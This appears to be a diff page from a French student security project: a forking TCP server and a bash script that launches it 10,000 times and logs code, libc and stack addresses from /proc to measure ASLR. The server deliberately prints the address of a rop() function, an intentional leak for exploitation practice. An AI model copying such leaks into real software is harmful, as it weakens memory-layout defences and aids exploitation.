||||
int main(int argc, char *argv[]) {
|
||||
if (argc != 2) {
|
||||
printf("ERREUR : Usage : ./serveur N°Port\n");
|
||||
exit(2);
|
||||
}
|
||||
|
||||
// install a handler for SIGSEGV in a part of your code
|
||||
if (signal(SIGSEGV, &handle_sigsegv) == SIG_ERR) {
|
||||
fprintf(stderr, "Could not install SIGSEGV handler");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// install a handler for SIGCHLD in a part of your code
|
||||
if (signal(SIGCHLD, &handle_sigchild) == SIG_ERR) {
|
||||
fprintf(stderr, "Could not install SIGCHLD handler");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// install a handler for SIGINT in a part of your code
|
||||
if (signal(SIGINT, &handle_sigint) == SIG_ERR) {
|
||||
fprintf(stderr, "Could not install SIGINT handler");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// On crée le socket local
|
||||
main_sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (main_sock == -1) {
|
||||
printf("ERREUR lors de la création du socket\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// On cree l'adresse du socket local
|
||||
struct sockaddr_in addr_local;
|
||||
int binder;
|
||||
|
||||
addr_local.sin_family = AF_INET;
|
||||
addr_local.sin_port = htons(atoi(argv[1]));
|
||||
addr_local.sin_addr.s_addr = INADDR_ANY;
|
||||
|
||||
// On bind l'adresse du socket créee avec le socket local
|
||||
binder = bind(main_sock, (struct sockaddr *) &addr_local, sizeof(struct sockaddr_in));
|
||||
if (binder == -1) {
|
||||
perror("ERREUR lors du bind du socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Initialisation file d'attente
|
||||
listen(main_sock, 100);
|
||||
|
||||
// Variable de stockage de l'addresse emmeteur
|
||||
struct sockaddr_in addr_em;
|
||||
unsigned int longueur_addr_em = sizeof(struct sockaddr_in);
|
||||
|
||||
// Initialisation de la liste des processus
|
||||
liste = new_list();
|
||||
|
||||
// On se met en état d'acceptation de connexion (et on crée un socket en
|
||||
// passant)
|
||||
int pid = 1;
|
||||
int nb_connexions = 0;
|
||||
|
||||
printf("CTRL+C pour terminer\n");
|
||||
|
||||
printf("addresse de rop() : %ld\n", (long) &rop);
|
||||
while (pid != 0) {
|
||||
|
||||
int sock_connexion = accept(main_sock, (struct sockaddr *) &addr_em, &longueur_addr_em);
|
||||
if (sock_connexion == -1) {
|
||||
printf("ERREUR lors de l'acceptation de la connexion\n");
|
||||
exit(1);
|
||||
} else {
|
||||
nb_connexions++;
|
||||
}
|
||||
pid = fork();
|
||||
|
||||
if (pid == -1) {
|
||||
printf("ERREUR lors du fork\n");
|
||||
exit(1);
|
||||
} else if (pid == 0) {
|
||||
process(sock_connexion);
|
||||
} else {
|
||||
add_proc(&liste, pid, sock_connexion);
|
||||
//printf("Processus %d created\n", pid);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
0
serveur_data.txt
Normal file
0
serveur_data.txt
Normal file
1
startCodeAddr
Normal file
1
startCodeAddr
Normal file
|
|
@ -0,0 +1 @@
|
|||
5598ef399000
|
||||
1
startLibcAddr
Normal file
1
startLibcAddr
Normal file
|
|
@ -0,0 +1 @@
|
|||
7f05357f2000
|
||||
1
startStackAddr
Normal file
1
startStackAddr
Normal file
|
|
@ -0,0 +1 @@
|
|||
7ffc973b5000
|
||||
27
stats.sh
Executable file
27
stats.sh
Executable file
|
|
@ -0,0 +1,27 @@
|
|||
#!/bin/bash
|
||||
|
||||
numPort=$1;
|
||||
rm output.csv;
|
||||
touch output.csv;
|
||||
echo 'startCodeAddr,endCodeAddr,startLibAddr,endLibAddr,startStackAddr,endStackAddr' >> output.csv;
|
||||
|
||||
for ((nbIte=1; nbIte<=10000; nbIte++))
|
||||
do
|
||||
./serveur $numPort & > serveur_data.txt;
|
||||
sleep 0.01;
|
||||
pid=`ps -ef | grep serveur | grep -v grep | awk '{print $2}'`;
|
||||
#echo "Ité $nbIte, pid = $pid";
|
||||
if [ -n "$pid" ]
|
||||
then
|
||||
startCodeAddr=`cat /proc/$pid/maps | grep /home/elies/Cours/4A/PIRDir/PIR/serveur | grep r-xp | awk '{print $1}' | awk -F "-" '{print $1}'`;
|
||||
endCodeAddr=`cat /proc/$pid/maps | grep /home/elies/Cours/4A/PIRDir/PIR/serveur | grep r-xp | awk '{print $1}' | awk -F "-" '{print $2}'`;
|
||||
startStackAddr=`cat /proc/$pid/maps | grep stack | awk '{print $1}' | awk -F "-" '{print $1}'`;
|
||||
endStackAddr=`cat /proc/$pid/maps | grep stack | awk '{print $1}' | awk -F "-" '{print $2}'`;
|
||||
startLibcAddr=`cat /proc/$pid/maps | grep /lib/x86_64-linux-gnu/libc-2.31.so | grep r-xp | awk '{print $1}' | awk -F "-" '{print $1}'`;
|
||||
endLibcAddr=`cat /proc/$pid/maps | grep /lib/x86_64-linux-gnu/libc-2.31.so | grep r-xp | awk '{print $1}' | awk -F "-" '{print $2}'`;
|
||||
echo "$startCodeAddr,$endCodeAddr,$startLibcAddr,$endLibcAddr,$startStackAddr,$endStackAddr" >> output.csv;
|
||||
fi
|
||||
kill -9 $pid &> /dev/null;
|
||||
done
|
||||
|
||||
|
||||
Loading…
Reference in a new issue